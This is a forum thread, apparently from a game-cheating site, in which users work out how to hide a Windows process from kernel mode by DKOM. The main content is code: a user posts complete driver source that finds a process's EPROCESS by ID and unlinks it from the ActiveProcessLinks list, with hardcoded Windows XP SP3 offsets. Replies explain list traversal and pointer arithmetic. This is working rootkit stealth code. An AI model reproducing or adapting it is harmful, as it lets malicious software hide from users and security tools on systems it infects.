View previous topic :: View next topic |
Author |
Message |
Stylo Grandmaster Cheater Supreme Reputation: 3
Joined: 16 May 2007 Posts: 1073 Location: Israel
|
Posted: Fri Apr 08, 2011 8:29 am Post subject: DKOM Question ( EPROCESS Access ) |
|
|
Hi,
Recently i have started reading about DKOM
I tried accessing the EPROCESS structure to obtain the LIST_ENTRY for the next and previous EPROCESS
so i could link the previous process to it's next one for hiding the process
after a lot of BSOD's i gave up and decided to ask some1 that already have done it
when i'm writing that
Code: |
NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
PEPROCESS process;
PLIST_ENTRY list_active_procs;
process = PsGetCurrentProcess();
list_active_procs = (PLIST_ENTRY)( process + 0x88 /* offset */ );
}
|
i get a compilation error that says that unknown size for eprocess
so when i try to access it through inline asm
i get the BSOD after i access the Flink member of LIST_ENTRY
any1 have an idea? _________________
Stylo |
|
Back to top |
|
|
Innovation Grandmaster Cheater Reputation: 12
Joined: 14 Aug 2008 Posts: 617
|
Posted: Fri Apr 08, 2011 2:43 pm Post subject: |
|
|
The offset to the ActiveProcessLinks member of the EPROCESS structure may change between versions of Windows. Windows XP uses 0x88, while Windows Vista and Windows 7 use 0xA0 and 0xB8, respectively. Also, you should cast the pointer to the EPROCESS structure to an integer of some kind. |
|
Back to top |
|
|
Stylo Grandmaster Cheater Supreme Reputation: 3
Joined: 16 May 2007 Posts: 1073 Location: Israel
|
Posted: Sat Apr 09, 2011 1:27 am Post subject: |
|
|
can you take a look at what i'm doing here?
Code: |
#include <ntddk.h>
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) {
DbgPrint( "Driver Unloaded!" );
}
NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
PEPROCESS process;
INT i_process, count = 0, currentProcessId, Addr;
PLIST_ENTRY list_active_procs;
pDriverObject->DriverUnload = OnUnload;
DbgPrint( "Driver Loaded!" );
// EPROCESS for the current process
process = PsGetCurrentProcess();
while( count ++ < 10 ) {
// Casting EPROCESS to INT
i_process = (INT)process;
// Print EPROCESS Address
DbgPrint( "EPROCESS Address = %x", i_process );
// Get the process id from eprocess and print it
currentProcessId = *(INT*)(i_process + 0x84 /* UniqueProcessId offset for win. xp sp3 */ );
DbgPrint( "Current Process Id = %d", currentProcessId );
// Get the LIST_ENTRY from the current EPROCESS
Addr = *(INT*)(i_process + 0x88 /* ActiveProcessList offset for win. xp sp3 */ );
list_active_procs = (PLIST_ENTRY)Addr;
// Get the next EPROCESS (Flink)
process = (PEPROCESS) list_active_procs->Flink;
}
return STATUS_SUCCESS;
}
|
i'm trying to the first 10 EPROCESS's after the current EPROCESS
but i always get BSOD
for the first EPROCESS structure's process id i always get: 4
so i guess this is the System process _________________
Stylo |
|
Back to top |
|
|
Innovation Grandmaster Cheater Reputation: 12
Joined: 14 Aug 2008 Posts: 617
|
Posted: Sat Apr 09, 2011 8:45 am Post subject: |
|
|
The current process will always be the System process unless the driver's execution of the code was caused by an IOCTL, so you're essentially using PsActiveProcessHead. And, as the definition of LIST_ENTRY dictates, Flink points to the next Flink, not the next EPROCESS.
I was unable to test the following code, but hopefully it will work. Keep in mind that ActiveProcessList is a circular doubly-linked list, so if there are less than ten processes, it will wrap back around.
Code: | #include <ntddk.h>
VOID Unload(__in PDRIVER_OBJECT pDriverObject)
{
DbgPrint("Driver Unloaded!");
}
NTSTATUS DriverEntry(__in PDRIVER_OBJECT pDriverObject, __in PUNICODE_STRING pRegistryPath)
{
pDriverObject->DriverUnload = Unload;
DbgPrint("Driver Loaded!");
PEPROCESS pProcess = PsGetCurrentProcess();
int nProcessIdentifier;
PLIST_ENTRY pActiveProcessLinks;
for(int nCount = 0; nCount < 10; ++nCount)
{
DbgPrint("EPROCESS Address = %x", (DWORD_PTR)pProcess);
nProcessIdentifier = *(int *)((DWORD_PTR)pProcess + 0x84);
DbgPrint("Process Identifier = %d", nProcessIdentifier);
pActiveProcessLinks = (PLIST_ENTRY)((DWORD_PTR)pProcess + 0x88);
pProcess = (PEPROCESS)((DWORD_PTR)pActiveProcessLinks->Flink - 0x88);
}
return STATUS_SUCCESS;
} |
|
|
Back to top |
|
|
Stylo Grandmaster Cheater Supreme Reputation: 3
Joined: 16 May 2007 Posts: 1073 Location: Israel
|
Posted: Sat Apr 09, 2011 9:44 am Post subject: |
|
|
Innovation wrote: | The current process will always be the System process unless the driver's execution of the code was caused by an IOCTL, so you're essentially using PsActiveProcessHead. And, as the definition of LIST_ENTRY dictates, Flink points to the next Flink, not the next EPROCESS.
I was unable to test the following code, but hopefully it will work. Keep in mind that ActiveProcessList is a circular doubly-linked list, so if there are less than ten processes, it will wrap back around.
Code: | #include <ntddk.h>
VOID Unload(__in PDRIVER_OBJECT pDriverObject)
{
DbgPrint("Driver Unloaded!");
}
NTSTATUS DriverEntry(__in PDRIVER_OBJECT pDriverObject, __in PUNICODE_STRING pRegistryPath)
{
pDriverObject->DriverUnload = Unload;
DbgPrint("Driver Loaded!");
PEPROCESS pProcess = PsGetCurrentProcess();
int nProcessIdentifier;
PLIST_ENTRY pActiveProcessLinks;
for(int nCount = 0; nCount < 10; ++nCount)
{
DbgPrint("EPROCESS Address = %x", (DWORD_PTR)pProcess);
nProcessIdentifier = *(int *)((DWORD_PTR)pProcess + 0x84);
DbgPrint("Process Identifier = %d", nProcessIdentifier);
pActiveProcessLinks = (PLIST_ENTRY)((DWORD_PTR)pProcess + 0x88);
pProcess = (PEPROCESS)((DWORD_PTR)pActiveProcessLinks->Flink - 0x88);
}
return STATUS_SUCCESS;
} |
|
Yeah, you were right about that
and i finally managed to hide a process properly
here's the full code for it
Code: |
#include <ntddk.h>
#define PROCESS_TO_HIDE 1234 // Process Id to hide
#define EPROCESS_OFFSET_PID 0x84
#define EPROCESS_OFFSET_ACTIVEPROCS 0x88
INT GetEprocessByProcessId( INT ProcessId ) {
PEPROCESS eProcess;
INT iProcess, currentProcessId;
LIST_ENTRY *list_active_procs;
eProcess = PsGetCurrentProcess();
iProcess = (INT)eProcess;
while( 1 ) {
currentProcessId = *(INT*)(iProcess + EPROCESS_OFFSET_PID);
if( currentProcessId == ProcessId )
return iProcess;
list_active_procs = (LIST_ENTRY *)(iProcess + EPROCESS_OFFSET_ACTIVEPROCS);
iProcess = (INT)list_active_procs->Flink;
iProcess -= EPROCESS_OFFSET_ACTIVEPROCS;
}
return 0x00000000;
}
VOID HideProcess( INT iProcess ) {
LIST_ENTRY *list_active_procs;
list_active_procs = (LIST_ENTRY*)(iProcess + EPROCESS_OFFSET_ACTIVEPROCS);
*((INT*)list_active_procs->Blink) = (INT)list_active_procs->Flink;
*((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;
list_active_procs->Flink = (LIST_ENTRY *) &(list_active_procs->Flink);
list_active_procs->Blink = (LIST_ENTRY *) &(list_active_procs->Flink);
}
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) {
DbgPrint( "Driver Unloaded!" );
}
NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
INT iProcess;
pDriverObject->DriverUnload = OnUnload;
DbgPrint( "Driver Loaded!" );
iProcess = GetEprocessByProcessId( PROCESS_TO_HIDE );
DbgPrint( "EPROCESS for %d found", PROCESS_TO_HIDE );
DbgPrint( "Address = %x", iProcess );
DbgPrint( "Attempting to hide %d . .", PROCESS_TO_HIDE );
HideProcess( iProcess );
return STATUS_SUCCESS;
}
|
Thank you for your help _________________
Stylo |
|
Back to top |
|
|
brunojex How do I cheat? Reputation: 0
Joined: 30 Jan 2013 Posts: 5
|
Posted: Tue Jul 09, 2013 10:53 pm Post subject: |
|
|
*((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;
I pretty mutch get everything but this line, i cant figure out why it is Flink +1 and not just Flink.
Anyone can explain? |
|
Back to top |
|
|
Innovation Grandmaster Cheater Reputation: 12
Joined: 14 Aug 2008 Posts: 617
|
Posted: Wed Jul 10, 2013 1:58 am Post subject: |
|
|
brunojex wrote: | *((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;
I pretty mutch get everything but this line, i cant figure out why it is Flink +1 and not just Flink.
Anyone can explain? |
It's the same thing (assuming sizeof(LIST_ENTRY *) == sizeof(int *) == sizeof(int)) as:
Code: | list_active_procs->Flink->Blink = list_active_procs->Flink; |
See pointer arithmetic.
It was for this reason that I said to cast the pointer to the EPROCESS structure to an integer when dealing with byte offsets, else it will increment in multiples of sizeof(EPROCESS) which was not what was desired. The size of EPROCESS is unknown anyway, and that's why Stylo had compilation errors initially. DWORD_PTR is an integer Windows data type created specifically for this sort of scenario and what I used in my example code. |
|
Back to top |
|
|
brunojex How do I cheat? Reputation: 0
Joined: 30 Jan 2013 Posts: 5
|
Posted: Wed Jul 10, 2013 8:32 pm Post subject: |
|
|
ah i was reading it wrong actually
Code: | *((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;
|
this is changing the forward process blink field
Code: | *((INT*)list_active_procs->Blink) = (INT)list_active_procs->Flink;
|
and this is changing the rearward process Flink field
i was thinking of it the other way aroud , thats why i got confused, my mistake....
Anyways thx for reply, it helped me figure out i was mistaken
so a pointer +1 will always be sizeof (pointer) bytes of the original pointer,
but if it aint a pointer but a DWORD+1 for example it will only be 1 byte of the original adress right? |
|
Back to top |
|
|
|